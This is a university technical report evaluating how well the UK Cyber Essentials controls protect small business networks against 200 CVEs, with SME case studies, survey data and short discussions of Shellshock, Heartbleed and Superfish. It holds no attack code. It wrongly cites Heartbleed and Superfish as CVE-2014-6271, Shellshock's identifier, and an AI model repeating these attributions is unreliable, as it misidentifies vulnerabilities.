Cite asSuch JM Vidler J Seabrook T Rashid A Cyber Security ControlsEffectiveness A Qualitative Assessment of Cyber Essentials TechnicalReport SCC-2015-02 Security Lancaster Lancaster University 2015
AcknowledgementsThis Cyber Security research project was funded by the UKGovernment
DisclaimerThis material is provided for general information purposes only Youshould make your own judgement as regards use of this material andseek independent professional advice on your particular circumstancesNeither the publisher nor the author nor any contributors assumeany liability to anyone for any loss or damage caused by any error oromission in the work whether such error or omission is the result ofnegligence or any other cause
ContentsExecutive Summary 2
Introduction 3Aims 3
Methodology 4Data Collection 4Vulnerabilities 4Mitigation Assessment 5
Analysis 6Full Vulnerabilities Assessment 6Case Studies 6Survey Responses 8
Analysis of Cyber Essentials on High Profile Vulnerabilities 10ldquoShellShockrdquo 10ldquoHeartbleedrdquo 10ldquoSuperfishrdquo 10Threat Analysis 11
Conclusions 12Additional Tools 12Cyber Essentials Controls 12Recommendations 12
References 13
Cyber Controls Applicability 14
CVE Details 19
Survey Responses 27
Executive SummaryFindings
This report assesses the Cyber Essentialscontrols effectiveness in mitigating cyber-threats
Two-hundred randomly selected internet-originating vulnerabilities are analysed formitigation across four SME networks with andwithout the Cyber Essentials controls in placeA network built from survey responses is usedto assess the typicality of the SME networksas well as to develop a broader understandingof typical SME network configurations andsecurity-practice
The aggregated results show that withoutthe Cyber Essentials controls none of the
attacks assessed were mitigated on anynetwork This more than anything elseshould be understood by SMEs taking noaction to combat cyber threats simply isnrsquot anoption
With the CE tools more than 99of the vulnerabilities in SMEs interviewedwere mitigated as shown in the figure belowwhich depicts the aggregated results across allcases studied The approx 13 of exploitsonly partially mitigated rely on hardware orsoftware vendors to release patches succinctlyand effectively to combat any vulnerabilities
Once the vendor has released a security
patch the Patch Management componentof Cyber Essentials ensures that the systemreturns to a secure state However up until apatch is released there remains a vulnerabilityin the network For this reason it shouldbe stressed for SMEs to frequently considerwhat services or software is installed whetherit is necessary and whether a more securealternative is available
The few vulnerabilities not mitigated byCyber Essentials are as such because offundamental hard-coded flaws in hardware orsoftware that are unable to be updated orpatched to a secure state
Figure 1 Cyber Essentials Aggregated Vulnerability Mitigation Results
Recommendations
Although the Cyber Essentials tools havebeen shown to successfully mitigate thevast majority of the attacks assessed it isimportant to note that only rsquocommodity-levelrsquoexploits (as defined by the Cyber EssentialsFramework)[10] viable for a remote attackhave been considered
The scope of this report does notaddress vulnerability to insider threats socialengineering physically proximate attackersor other targeted-attacks it may berecommended that a follow-up study with awider scope be carried out to investigate therisks from other forms of attack with the useof Cyber Essentials
The rsquo10 Steps to Cyber Securityrsquo reportpublished by CESG[2] highlights that inorder to maximise the security of a networkit is essential to not only consider theprevention of attacks with the use of toolsbut to also ensure that all employees areadequately educated in network securityand treated with scrutiny through accesslogs and data-loss-prevention schemes inorder to achieve a secure business in the faceof potential local and remote attacks Wewould recommend that especially for largerorganisations additional security measuressuch as these be put in place
For hardware or software identified as
inherently flawed resulting in unmitigatablevulnerabilities our recommendation is thatthese pieces of software or hardware beavoided at all costs when developing an SMEnetwork In addition a global list of un-safe products could be collectively developedand made publicly available This relates toour last recommendation of integrating CyberEssentials further with collective securityapproaches such as The Cyber-securityInformation Sharing Partnership (CiSP)[4]These approaches keep SMEs with the latestinformation about vulnerabilities and othercyber-threat information
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 2 of 28
IntroductionC
yber Essentials was introduced asa government funded scheme firstpublished in April 2014 as an interest
of national security to bolster UK securityin cyberspace The Cyber Essentialsscheme was developed in collaboration withthe Information Assurance for Small andMedium Enterprises (IASME) consortiumthe Information Security Forum (ISF) andthe British Standards Institution (BSI) as aset of basic technical security controls fororganisations to utilize for the mitigation ofthe lsquobottom 80rsquo of remote cyber-threats[3]
The scheme built to provide animplementable of the 10-steps to Cyber-Security[1] was released as part of the2011 UK Cyber Security Strategy[16] andis being backed by the UK government asan organisational standard Thus far it hasbeen adopted by several large organisationsincluding Vodafone Hewlett-Packard (HP)BAE Systems Virgin Media and Barclays[5]
The Cyber Essentials accreditation hasbeen made mandatory from October 1st
2014 for all suppliers of government contractsinvolving ldquothe handling of sensitive andpersonal information and provision of certaintechnical products and servicesrdquo[17]
The Cyber Essentials security controls aresummarised as follows[7]
Firewalls and GatewaysThese are devices designed to preventunauthorised access to or from privatenetworks but good setup of thesedevices either in hardware or softwareform is important for them to be fullyeffective
Secure configurationEnsuring that systems are configured inthe most secure way for the needs ofthe organisation
Access controlEnsuring only those who should haveaccess to systems to have access and atthe appropriate level
Malware protectionEnsuring that virus and malwareprotection is installed and is it up todate
Patch managementEnsuring the latest supported version ofapplications is used and all the necessarypatches supplied by the vendor beenapplied
Figure 2 Cyber Essentials Security Tools
The intended scope of Cyber Essentialsis outlined in the Cyber Essentials SchemeAssurance Framework[10] This states thatthe CE controls are considered as applicableto all sizes of Enterprise as a base level ofprotection against cyber-attacks upon whichindividual organisations may build on withfurther tools network devices or protocols forthe mitigation of targeted attacks The CEScheme is clear in its inclusion of lsquoBring your
own Devicersquo network setups to scope as wellas Cloud-based services and off-the-shelf webapplications Bespoke IT systems such as inmanufacturing and retail are applicable to CEbut hold additional vulnerabilities due to theirnature that are not to be considered
Aims
The purpose of this report is to investigatethe effectiveness of the Cyber Essentialscontrols in mitigating lsquocommodity-levelrsquoattacks attempting to exploit vulnerabilitiesin Small and Medium Enterprise (SME)networks
A commodity-level attack has been definedby CESG[8] as
Any unauthenticated remote attackexploiting a known vulnerability withthe use of tools and techniques openlyavailable for download or purchaseon the internet - and that do notrequire extensive specialist knowledge toconduct1
To effectively assess Cyber Essentials itis firstly necessary to understand the typicalnetwork configurations of SMEs Interviewswith SMEs were carried out to build abstractednetwork models and a survey has beenconducted to build a broader picture of SMEnetwork deployments The survey resultswill help to develop our understanding ofcurrent security practice and cyber-awarenessas well as to build a general-case SME networkwith which to analyse the typicality of SMEsinterviewed
The networks modelled from collected dataare to be considered with and without the useof the Cyber Essentials security controls tocomparatively establish the protection grantedwith the adoption of the CE scheme
1This includes attacks utilising pen-testing software such as Metasploit Kali and the Poison Ivy remote access tool which are capable of scanning network nodes for publiclyknown vulnerabilities in the operating system applications or services in use
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 3 of 28
MethodologyT
he scheme of work for this report has beensplit into the following sections
bull Collection of data through interviews anda survey regarding the implementationand deployment of networks in real-worldSMEs for use in designing paper-modelsto be analysed
bull Composition of a list of suitablevulnerabilities that contains applicablemethods by which remote attackers canexploit commodity-level attacks
bull Assessment of vulnerability mitigation forSME networks with and without the useof the CE Tools
Data Collection
In order to analyse the effectiveness of theCyber Essentials Security Tools four real-world SME networks have been modelledModels have been composed using informationgathered in interviews and abstracted toreduce redundant complexity and removeany linkage with the SME In addition ageneralisable SME model was composed fromSurvey responses to serve as a baselinenetwork from which all SME networks maybe adapted
Interviews
The interviews were composed with the goalof firstly understanding the layout or topologyof the network deployed by an SME To thenbuild on the network configuration it wasimportant to understand how the network isused - where remote connections take placehow local services are utilised and how anattacker sees the network Hardware vendorsoperating systems and version numbers wereconsidered to build a greater understanding ofthe network
Additional questions were posed toexamine the current state of security on thenetwork such as any security accreditationsprevious breaches and how often updates arerolled out
Survey
The Survey was constructed as a stripped-down questionnaire representing the essenceof the questions posed in the Interviews Thisincluded details of the number of workstationsat the SME to gauge its size the localand remote services available the operatingsystems used on the service providers andworkstations the current security policies in
place and the respondentsrsquo awareness of theCE Scheme
Two surveys were sent out one to a securelist of SMEs in the NW Security Cluster[9]and another publicly to closed groups ofsecurity-interested SME representatives
Vulnerabilities
A total of 200 random vulnerabilitieshave been equally taken from two annualvulnerability lists of CVE-2013 and CVE-2014 published by Mitre2 Any vulnerabilitiesfound to be unsuitable for analysis have beenreplaced by a new candidate
In this report we use the Mitreorganisation definition for a vulnerabilitywhich they state as
An information securityldquovulnerabilityrdquo is a mistake in softwarethat can be directly used by ahacker to gain access to a system ornetwork CVE considers a mistake avulnerability if it allows an attackerto use it to violate a reasonablesecurity policy for that system (thisexcludes entirely ldquoopenrdquo security
2CVE is sponsored by US-CERT in the office of Cybersecurity and Communications at the US Department of Homeland Security
Figure 3 Methodology for Assessing Cyber Essentials
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 4 of 28
policies in which all users are trustedor where there is no consideration ofrisk to the system)
(As shown on Mitreorgrsquos Terminologypage[6] in March rsquo15)
To warrant a CVE entry into the Mitrelist individual vulnerabilities must place theaffected system (or systems) in to a statewhich either
bull allows an attacker to executecommands as another user
bull allows an attacker to access data that iscontrary to the specified access restrictionsfor that data
bull allows an attacker to pose as anotherentity
bull allows an attacker to conduct a denialof service
High-Profile Vulnerabilities
Three specific high-profile vulnerabilities werealso taken in addition to the randomly chosen200 and have been assessed to what extentthe Cyber Essentials scheme would affect thevulnerability of SMEs in these situations
Additionally the applicability of thesevulnerabilities to the SME networks we studiedis included along with the respective potentialto harm operations
Mitigation Assessment
The Vulnerabilities chosen have beenqualitatively assessed for mitigation withand without the use of the Cyber Essentialscontrols The process considers each
component of the controls in asserting whethereach vulnerability would be mitigated partiallymitigated or not mitigated The results aredouble-vetted to ensure correctness
For each of the SMEs Interviewed each ofthe vulnerabilities are assessed for applicabilityto that network configuration In cases wherethe vulnerability is for a specific model ofhardware the network is deemed applicable ifit uses a like-product from the same vendorIn cases where the vulnerability is in softwareonly those referencing software in-use or likelyin-use (based on the SMErsquos practice) aredeemed applicable to the network
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 5 of 28
AnalysisT
he analysis of data collected has beensplit into sections firstly each of thevulnerabilities have been assessed to
ascertain their mitigation with and withoutthe use of the Cyber Essentials controlsthis supposes a case where any software orhardware source of a vulnerability is in use (iea worst-case fully inclusive assessment)
What follows is an analysis into theinformation gathered from interviews FourSMEs from distinct industries are detailed inphysical infrastructure and service usage aswell as current user access policies and existingsecurity measures in place A summary of themitigation results in vulnerabilities in softwareand hardware used for each SME networkconfiguration is included
The full table for the applicability of allCVE vulnerabilities to each of the networkstructures can be found in the CVE Detailssection on page 19
Finally the data collected from the surveyis analysed and used to develop a general-case network model the SME networks arecompared to this to better understand thenuances of each market sector as well theoverall typical configuration of SMEs
Full Vulnerabilities Assessment
Of the entire list of 200 vulnerabilities from2013 and 2014 deemed as applicable tothe study and chosen for analysis 131vulnerabilities were mitigated with the useof the Cyber Essentials Security Tools 61vulnerabilities were partially mitigated and 8were not mitigated
Figure 4 Percentage of Full Vulnerabilities ListMitigated
Partially Mitigated 59 of the 61 CVEsjudged as partially mitigated are as suchbecause they rely of patches from third-party software or hardware vendors butthat will be mitigated once a security fixhas been released Despite any level ofsecurity tools being deployed on a network thesecurity involved in using third party softwareunfortunately relies on the vendorrsquos ability toidentify potential areas of risk as well asto quickly respond to security breaches as
they become apparent with the release ofpatches All software installed on an SMEnetwork should be periodically reviewed todecide whether it is necessary - or if thereare more suitable and potentially more securesolutions available
The other two partially mitigatedvulnerabilities rely on website blacklistingcombined with avoiding vulnerable webbrowser software A secure configurationwithout such a browser would mitigate thisvulnerability but as in the Web DevelopmentSME case study it may not always be possibleto avoid the use of a specific software pieceIn a case as this website blacklisting is theonly defence against the vulnerabilities
Not Mitigated - Secure ConfigurationSome vulnerabilities have been found to beunmitigatable using the CE controls in each ofthe found cases this is due to inherent flaws ina hardware device or software that can not befixed by a security patch or firmware update
For these devices that are fundamentallyflawed from a cyber-security stand-point itcan be that no level of security tools on top ofthe network can aid in mitigation - rather thehardware should be replaced to ensure networksecurity It may be possible for a public list ofall such devices to be developed as part of thegovernment cyber-security scheme - to serveas a device-blacklist for SMEs
Case Studies
Four SMEs were interviewed to build paper-models upon which the Cyber Essentialscontrols may be assessed Some detail on thephysical structure usage and existing securityof each network is provided
bull SME Network One represents a financespecialist SME using a combination ofexternally managed services for bankingin addition to internal remotely accessibleinternal services for employees
bull SME Network Two represents a specialistSME utilizing an off-site remotely managedserver for administrator services and cloud-based services for employees
bull SME Network Three represents a webservices SME that accesses client serversfrequently and utilises cloud-basedservices daily
bull SME Network Four represents a hospitalityservices provider with a very smallcompany network co-located with a verylarge guest network component where allof the services are remotely managed andlocated
SME Network One - Finance Sector
Physical Infrastructure The companyinterviewed comprised around 20 employeeslocated at 3 sites nationally
Remote workers connect over normalinternet connections both residential andcommercial and use both VPN and non-VPNtraffic (specifically web traffic on port 80) toaccess services supplied by the company
Figure 5 SME-1 Network
The hardware at the head office (wherethe interview was carried out) consists ofequipment by 3Com Draytek BT and Heuwaifor infrastructure components Employees usea range of machines bought between 2011and 2014 comprising a mix of Dell and LenovoPCs
As most of the infrastructure is passive(most of the traffic is handled by a single3Com BaseT-1000 switch) the firmware onthe equipment is unchanged from purchase ifany firmware is present at all
Services At the head office site a WindowsFile Server (SAMBA) server provides local filesharing and allows remote users to accessthe same files via VPN The mail servera Microsoft Exchange Server is an off-sitedeployment managed by an external companybut is a dedicated server for only this company
Additionally a web service and databaseserver is run from a server at the site Thisprovides both local HTTP access to thedatabase it runs as well as having firewallrules put in place to allow external access tothe same system for off-site employees
Numerous other pieces of banking softwareare run on bank-owned remote servers andare accessed and secured via combinationsof smart cards and PIN entry devices alsosupplied by the banks
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 6 of 28
User Access Employees are permitted toaccess the internet from both their individualworkstations and additional devices such assmart phones (although technically this is notpermitted by policy but this policy is notstrictly enforced) Internet access is howeverslightly filtered with access to Facebook beingblocked by the router
Access logs for any network operations arenot created and any machine in the office canaccess the network with no isolated islands
User accounts can be migrated betweenmachines via a Domain Controller but inpractice this is unlikely to actually happenwith users generally using their own machines
Operating systems Locally everything isWindows 7 the remote site uses Windows7 2 remote machines are Windows 81
Mitigation of applicable vulnerabilities Ofthe 200 listed vulnerabilities 119 wereapplicable to the first SME network
Figure 6 SME-1 Vulnerability Mitigation
Because much of this SMEs operationsare done via browser-based interfaces to otherfinancial companies (such as banks) it placesthem in the firing line for a large number ofthe browser based attacks Furthermore assome banks require specific browser versionsfor their interfaces to work they end upwith several different browsers with severalversions of each to cover all their requirementsopening them up multiple times to browser-based vectors
Additionally the heavy use of SSL-basedcommunication places them in a positionwhere any SSL vulnerabilities affect them too
SME Network Two - Specialist Group
Physical Infrastructure The second SMEparticipant employs 20-25 based acrossmultiple offices in one building
Employees may bring their own devices oruse a workstation provided Workstations areconnected to one of four switches via Ethernetand share a virtual LAN with other employeedevices An off-site server containing sensitivedata is accessible only to administrators viaSSH
Network Equipment includes an externalDell PowerEdge Server four TPLink SwitchAccess Points and a TPLink DHCP Router
Figure 7 SME-2 Network
Services Employee devices sharing thenetwork can use Windows Folder SharingEmployee devices include OSs OS XWindows XP Windows 7 amp Windows 8 withauto-updates enabled
Some Employee use of VPN to connectto another network for a data service Allother services are provided by cloud serversvia HTTPS Email Files amp Database as wellas management tools these are used daily
User Access Employees have no restrictionon their internet access and may use theirown equipment Administrators often accessa remote server database and file store actingas a web server Guests may access a separateWi-Fi network through the same access pointsas other office workers but do not sharethe same virtual LAN as employees Wi-Fiaccess logs are gathered but no other useractivity Employees can access the networkfrom any machine but the SMErsquos policy isthat all machines should have anti-malwareand strong passwords which are recommendedto be changed periodically with the employeemachines configured to automatically lockafter a period of inactivity
Mitigation of applicable vulnerabilitiesOf the 200 listed vulnerabilities 79 wereapplicable to the second SME network
Figure 8 SME-2 Vulnerability Mitigation
The specialist SME had the fewest overallpotential vulnerabilities largely owed toa higher reliance on cloud-based servicesAlthough this reduces the risk from inherentvulnerability in a network responsibility ishanded onto the service provider chosen Acertified and reputable cloud services providershould thus be sought to ensure protectionthrough the entire chain
SME Network Three - Web Development
Physical Infrastructure SME-3 employs 10workers based in one building
Employees are restricted from using theirown devices unless it is validated by thecompany head - in which case no others mayshare that device Workstations are connectedto one switch via Ethernet and share a virtualLAN with other employee devices
Network Equipment includes an externalDell PowerEdge Server one TPLink SwitchAccess Point and a TPLink DHCP Router
Figure 9 SME-3 Network
Services Employee devices sharing thenetwork can use Windows Folder SharingEmployee devices include OSs OS XWindows 7 amp Windows 8 with auto-updatesenabled
All services are provided by cloud serversvia HTTPS Email Files amp Database as wellas management tools these are used daily
User Access Employees have no restrictionon their internet access and commonly useall major browsers for compatibility testing
Guests are not permitted on the networkbut may join a rsquoguestrsquo network through thesame access points with a mobile device Wi-Fi logs and Cloud Service Access logs aregathered and actively monitored Employeescan access the network from a validatedmachine but the SMErsquos policy is thatall machines should have anti-malware and
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 7 of 28
strong passwords which are recommended tobe changed periodically with the employeemachines configured to automatically lockafter a period of inactivity
Mitigation of applicable vulnerabilities Ofthe 200 listed vulnerabilities 116 wereapplicable to the second SME network
Figure 10 SME-3 Vulnerability Mitigation
The requirement for web developmentSMEs to operate across multiple web browserson various versions to test and build acustomerrsquos website means that the networkaccumulates all vulnerabilities in web browsersAs this is a specialist case a recommendationfor web development organisations could beto use one up-to-date browser for general useA bespoke policy may then be put in place
When working on alternative browsersemployees should only access client pageswhere the developer has control of the web-content
SME Network Four - Hotel Services
Figure 11 SME-4 Network
Physical Infrastructure This company islocated at a single site and has equipmentcomposed of a single desktop PC and 2company laptops running on a ADSL router -this same router also provides the internetconnection for the guests An alternativerouter is available as a manual fall-backconnection to the internet but is availableonly to company equipment
The guest network is split from the officenetwork through secondary access point namesfiltering traffic in to a separate VLAN internalto the router
Services No local servers are present toprovide any service to employees or guestson the network
File storage is provided through on-lineservices including Dropbox and Skydrive Astandalone web-server owned and managedexternally runs the company website andbookings are managed via a globally accessiblewebsite
All the services are accessed with SSLsecured connections (HTTPS mainly)
User Access User access is not mediated inany way and any site can be accessed fromany computer Guests have no restrictionsplaced on their network usage either
Operating systems The company uses iOSfor their mobile devices and Windows 81 forthe office desktop and laptop PCs Guests canbring their own equipment so will be a mixof all operating systems currently availableincluding Windows Linux Mac and others
Existing Security Measures Beyond therouterrsquos separation between the guest andoffice networks no other network securitymeasures are in place The office PCs dohave automatic patch installation configuredhowever and have the Kaspersky antivirussuite installed
Mitigation of applicable vulnerabilities Ofthe 200 listed vulnerabilities 103 wereapplicable to the second SME network
Figure 12 SME-4 Vulnerability Mitigation
Similarly to SME 1 SME 4 requires theuse of web browsers for bookings and receptionof guests so enables a wide variety of attackvectors through the web
Thankfully the services and servers theyconnect to are run by larger corporationswhich will hopefully have implemented at leastCyber Essentials-grade security and protectionso the actual risks should be minimal
For the purposes of this report howeverwe assume that if this company has notimplemented Cyber Essentials then theservices they use must also not have leavingthem open to attack
Survey Responses
Data gathered from survey responses affordsa much broader look at the typical networkdeployments and practice in SMEs The fullresults from 17 participants may be found inthe Survey Responses section on page 27
Physical Infrastructure The majority ofrespondents belong to SMEs with 0-9workstations on site this is related to the sizeof an organisation - and could be consideredrepresentative of businesses across the UK
Services Local - File Email Database andDomain Servers are the most common localservice providers all present in more than 13rdof SMEs Remote - Email web hosting andfile-sharing are the most common servicesprovided remotely
User Access More than half of SMEs permitemployeersquos own devices to be used in theworkplace for organisations such as these it isimportant to ensure that employee machinesreceive the same level of protection as therest of the work network - as one vulnerablemachine allows vulnerability into the wholecompany
Existing Security Measures Of the surveyrespondents most SMEs have a firewallpassword policy and data-loss preventionscheme in place These are the mostcommon security measures in place forthe SMEs contacted below this is accesscontrol malware protection and finally patchmanagement which is present in a little overhalf of organisations
Almost two-thirds of survey participantswere previously aware of Cyber Essentials
Survey Respondents Network
The network built from Survey Respondentsdata considers the overall response in order tobuild a network easily adaptable to match thatof the majority of SME network configurations
Locally Email and File servers havebeen represented with domain controllercapabilities represented in a network ADSLRouter Remotely a web server is depictedbut remote services may also include databaseusage email and other web services
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 8 of 28
Figure 13 Adaptable Survey-Response Network
Typicality of Case-Study SMEs
Within the Survey Respondents networkaspects of each of the interviewed SMEnetworks is apparent
The Finance SME network shares a localfile server as sensitive information needs tobe kept and processed by the organisationAny SME handling sensitive information willbe likely to strongly consider using local fileservers
The Specialist SME shares with the surveyrespondents data itrsquos use of SSH to connectremotely to services SSH is an important toolfor accessing sensitive date while at home or
data that is stored remotely the workplace
The Web Development SME requiresemployees to connect to many web serversremotely the survey respondents match thiscase with the use of external web-hostingservices That being said in the general-casethis server is more likely to be the SMErsquos ownweb-hosting solution rather than a clients
The Hotel Services SME represents avery basic local network using only cloud-based services remotely This is becoming anincreasingly popular trend for SMEs as cloud-services are often easier to set up and cheaperto maintain This is also representative ofmany SMEs with little-to-no online presence
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 9 of 28
Analysis of CyberEssentials on High ProfileVulnerabilitiesT
he following sections detail three ofthe high-profile vulnerabilities to hit thepopular media in late 2014 to early 2015
These are of particular note as while they maynot be the most damaging of attack vectors(although some are very serious) they havecaught the attention of the public and SMEswould be under pressure to ensure that theywere protected
With this in mind we analyse how effectivethe Cyber Essentials security controls are attackling these high-profile vulnerabilities
ldquoShellShockrdquo
Also known by the name ldquoBashDoorrdquoShellshock hit the news as it attacked theLinux server environment and did so in aparticularly effective manner
GNU Bash through 43 processestrailing strings after functiondefinitions in the values ofenvironment variables which allowsremote attackers to execute arbitrarycode via a crafted environment asdemonstrated by vectors involvingthe ForceCommand feature inOpenSSH sshd the mod cgi andmod cgid modules in the ApacheHTTP Server scripts executedby unspecified DHCP clients andother situations in which setting theenvironment occurs across a privilegeboundary from Bash execution akaldquoShellShockrdquo NOTE the originalfix for this issue was incorrect CVE-2014-7169 has been assigned tocover the vulnerability that is stillpresent after the incorrect fix
CVE-2014-6271[13]
The exploit allowed attackers to directlyexecute arbitrary shell commands on acompromised system by altering environmentvariables However the bug was not enoughby itself to actually enable attackers tocompromise a system but allowed accessvia other services While the exploit is onlyeffective if the bash environment can bealtered the results can be devastating asit lays bare the entire system to many otherforms of attack
The threat was particularly insidious forSMEs who used LinuxUnix based servers forservices mail servers as an example as theywould potentially have no idea that they hadbeen compromised
ldquoHeartbleedrdquo
Appearing in April 2014 the CVE-2014-6271(aka rdquoHeartbleedrdquo) bug allowed attackers todirectly read the active memory of a targetmachine through buffer over-read This thenallowed attackers to access private credentials(or indeed anything else) in the RAM of thetarget
As described in the original CVE report
The (1) TLS and (2) DTLSimplementations in OpenSSL 101before 101g do not properlyhandle Heartbeat Extension packetswhich allows remote attackers toobtain sensitive information fromprocess memory via crafted packetsthat trigger a buffer over-read asdemonstrated by reading privatekeys related to d1 bothc andt1 libc aka the Heartbleed bug
CVE-2014-6271[12]
As OpenSSL is a core part of manyapplications and services both in the openand closed source world this vulnerabilityhad the potential to damage a huge numberof systems At the time of release varioussources (including for example Netcraft[15])that up to 17 of trusted SSL-certified serverswere vulnerable to the attack
Depending on how the SME in questionoperates the threat this particular CVE posed(and indeed still poses with still as yetto be updated servers still online with thevulnerability) is difficult to discern Obviouslythe vulnerability is serious but the ability ofindividual SMEs to detect and correct this flawwill vary greatly depending on the individualdeployments
Larger companies with their ownLinuxUnix servers may have be able to deploythe patched OpenSSL version as soon as thepatch was available but smaller businesses
or those with more cloud-based services maynot have access to the software running onthe servers they use and may be at the mercyof the respective operators to implement thefix Because of this patch management onlypartially remedies this vulnerability and otherprotection methods from the Cyber Essentialsguidelines such as securing configurations orcontrolling access will have unknown effects
It is vulnerabilities such as this that posethe greatest threat to SME networks as themethods to fix the issue are often outside thecontrol of the company potentially leavingthem vulnerable far longer than one wouldexpect
ldquoSuperfishrdquo
The SDK for Komodia Redirectorwith SSL Digestor as usedin Lavasoft Ad-Aware WebCompanion 118851766 and Ad-Aware AdBlocker (alpha) 13691Qustodio for Windows AtomSecurity Inc StaffCop 58 andother products uses the sameX509 certificate private key fora root CA certificate across differentcustomersrsquo installations whichmakes it easier for man-in-the-middleattackers to spoof SSL servers byleveraging knowledge of this keyas originally reported for SuperfishVisualDiscovery on certain LenovoNotebook laptop products
CVE-2014-6271[14]
This vulnerability is particularly interestingas the software causing the issue waseffectively brokered by a trusted hardwarevendor namely Lenovo Because the issuewas part of the lsquonormal configurationrsquo forthe equipment it remained undetected fora long time and hints that there may befurther breaches in security as yet undiscoveredin both Lenovo and other manufacturerrsquosequipment
The vector is through the SuperFishsoftware essentially breaking the chain of trustfor SSL certificates by installing a self-signingcertificate in to the list of trusted certificateson the host machine This allows an attackerto simply sign their own code via the same
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 10 of 28
certificate which itself can be easily gatheredfrom any other machine running SuperFishand they have full access to any SSL-securedconnection from the target machine
Thankfully while the risks to users andSMEs was high the fix is a simple one-timerun of a removal tool provided by Lenovothemselves[11] and is mitigated fully throughthe Cyber Essentials patch managementadvice
Threat Analysis
ShellShock Without Cyber Essentials inplace SME 1 and 2 would be at risk fromlsquoShellshock as they both operate UnixLinuxbased systems that would require patching toplug the security issue The extent at whichSMEs 3 and 4 are vulnerable to this issue isunclear as their large dependency on outside
service providers leaves them in a positionwhere they are both unable to determine theirvulnerability and additionally unable to remedyit
With Cyber essentials SME 1 and 2 wouldbe fully protected and it is likely that SME3 and 4 are also protected if the externalproviders also use a Cyber Essentials or othersecurity and patching schemes
Heartbleed The lsquoHeartbleedrsquo bug is anothervulnerability that without Cyber Essentialsguidelines being followed would have laidcompanies external-facing services open tomalicious attackers
In all cases however each SME can befully protected with a combination of patchmanagement firewalling and application ofaccess controls from the Cyber Essentialsguidelines
SuperFish All of the SMEs we interviewedcould be exceedingly vulnerable to thelsquoSuperfishrsquo issue without Cyber Essentialsas much of their operations revolve aroundSSL encrypted communications A break inthe chain-of-trust for their certificates wouldallow an attacker to man-in-the-middle theircommunications
Normal system updates would have failedto remedy the situation as the fix providedby Lenovo consisted of a tool to be runin addition to the normal operating systempatches It is further debatable how effectiveCyber Essentials patch management wouldhave been in plugging this vulnerability as itwould require that the administrators be awareof the issue and know of the patch rather thansimply following lsquonormalrsquo patching guidelinesAssuming that the persons responsible for theequipment are aware of the issue howeverthen Cyber Essentials patch management fullymitigates this issue
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 11 of 28
ConclusionsT
he Cyber Essentials Security Tools havebeen shown to mitigate or to mitigateas soon as a patch is released all
vulnerabilities from remote attackers that donot exploit fundamentally insecure software orhardware Of the two-hundred vulnerabilitiescollected eight exploits were not able tobe resolved with the deployment of securitypatches for vulnerabilities such as these theonly mitigation available is simply not to installthe compromised systems To help preventdeployments being susceptible to attacks onfaulty systems it may be recommended that ablacklist of such items is composed for publicreference
Scope It is important to consider that thescope of this study covers only internet-basedcommodity-level attacks and although theCyber Essentials tools performs very well inmitigating this it does not represent fullsecurity There is an increasingly identifiedrisk from insiders that also requires attentionnot least malicious acts but also from usersunknowingly compromising security
The SMEs interviewed representorganisations from a range of market sectorsin web development and online presencespecialist scientific services the hospitalityindustry and finance
Additional Tools
The 10 Steps to Cyber Security[2] identifiesadditional security measures that supportthe Cyber Essentials Scheme well todeliver additional security through indirectmeasures such as User Education Awarenessalong with Network and Systems MonitoringThese additional measures would serve tobolster cyber security through fortifyingeach employee of the SME with necessaryknowledge on safe practice itrsquos importanceand some technical basic understanding -just as they may be versed in environmentalawareness Network and Systems Monitoringallows for remote user logins as well as fileaccess and activity to be logged For verysmall networks this may be currently infeasibleas the extra manpower or finances required for
such a system are costly However for largeorganisations additional monitoring capabilityshould be explored as a future extension tothe Cyber Essentials not just to identify andmitigate malicious action for more bespokeand sophisticated attacks than those reportedon but to also aid in providing evidence forany potential cyber-crime investigations
There exist some collective approaches toimproving cyber-security a notable example ofthis is The Cyber-security Information SharingPartnership (CiSP)[4] The partnership aimsto benefit all members by providing real-time updates on issues of cyber-securityand discovered vulnerabilities as well asbest-practice guides and other cyber-threatinformation It would be beneficial formore organisations to belong to cyber-securitycollectives like this creating networks ofinformed individuals working together to tacklecyber-crime This would be particularly usefulto quickly identify potential vulnerabilitiesand possible patches which as shown inthis report is critical for the CE patchmanagement security control to fully mitigaterelated vulnerabilities
An important note to be made is towardthe security of business affiliates and serviceproviders Even if an SME has CyberEssentials in place any use of cloud-servicesrelies on the vendorrsquos security controls forthreat mitigation In other words cloud-email accounting and any other cloud-basedor remote services are only as secure as theservice provider makes it In general cloud-providers should be holding a high level ofscrutiny to their security practice and shouldbe encouraged to certify their protectionHewlett-Packard(HP) has taken this furtherand has begun to strengthen itrsquos entire supply-chain ( 600 SMEs) with the Cyber Essentialsaccreditation This provides protection acrossthe entirety of Hewlett Packardrsquos operationsas well as itrsquos affiliates This should be agoal for organisations of all sizes minimisingthe risk from cyber-threats by ensuring alltrading partners uphold the same high levelsof security
Cyber Essentials Controls
Of the five current Cyber Essentials ControlsPatch Management was considered to aid inthe mitigation of the highest proportion ofremote attacks (875 ) counter-intuitivelythe Survey responses had patch managementranked last in use for SMEs The highestcurrently used controls could be seen asthose providing the most intuitive or easilyunderstood protection Data loss preventionstrong passwords and firewall While patchmanagement isnrsquot necessarily understood byindividuals as a tool to greatly improve cyber-security
Anti-Malware was useful in mitigating theleast (10 ) vulnerabilities It is howeverimportant to note that Anti-Malware is largelythe only security tool that may routinely scanthe network hardware and software as wellas any items downloaded from the internetor as email attachments This serves as alast line of defence and as such is vital to anorganisationrsquos cyber-safety
Recommendations
To further improve cyber-security across theUK we recommend that
1 Collective approaches to cyber securityshould be further encouraged Inparticular a governmentalcollectiveapproach to identifying inherently flawedproducts should be developed Thiscould be in addition to or as an extensionto current initiatives like CiSP whichcan make a difference in detecting andreacting on potential vulnerabilities in atimely manner
2 Further research into the mitigation ofother cyber-threats is carried out toexplore the risk from insider-threats andtargeted attacks
3 Further employee education is stronglyencouraged specially to be able totackle these other types of attacksmentioned above which were not underthe scope of this report
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 12 of 28
